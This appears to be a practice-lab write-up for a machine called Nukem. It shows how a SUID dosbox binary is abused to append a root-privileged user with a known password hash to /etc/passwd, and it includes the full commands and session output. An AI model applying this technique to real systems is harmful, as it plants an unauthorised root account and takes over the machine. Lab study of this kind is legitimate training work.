dosbox
The binary, /usr/bin/dosbox, has SUID bits set. This was later confirmed by PEAS as well
/Practice/Nukem/4-Post_Enumeration/attachments/{FAAA674E-50F3-4099-9AC3-3763EE04664C}.png)
According to the GTFOBins, it can be leveraged to arbitrarily write data to file
Issue
[http@nukem tmp]$ LFILE='/etc/passwd'
[http@nukem tmp]$ openssl passwd qwe123
5bt0JheqDrqDY
[http@nukem tmp]$ /usr/bin/dosbox -c 'mount c /' -c "echo rooted:5bt0JheqDrqDY:0:0::/root:/bin/bash >>c:$LFILE" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/passwd
[http@nukem tmp]$ tail -n 1 /etc/passwd
rooted:5bt0JheqDrqDY:0:0::/root:/bin/bash
[http@nukem tmp]$ su rooted
Password: qwe123
Warning: your password will expire in 32510 days.
: No such file or directorybash
[http@nukem tmp]$ Overwriting to the /etc/passwd file successful
While the authentication itself appears to be working, the system failed to spawn a SHELL
Found a workaround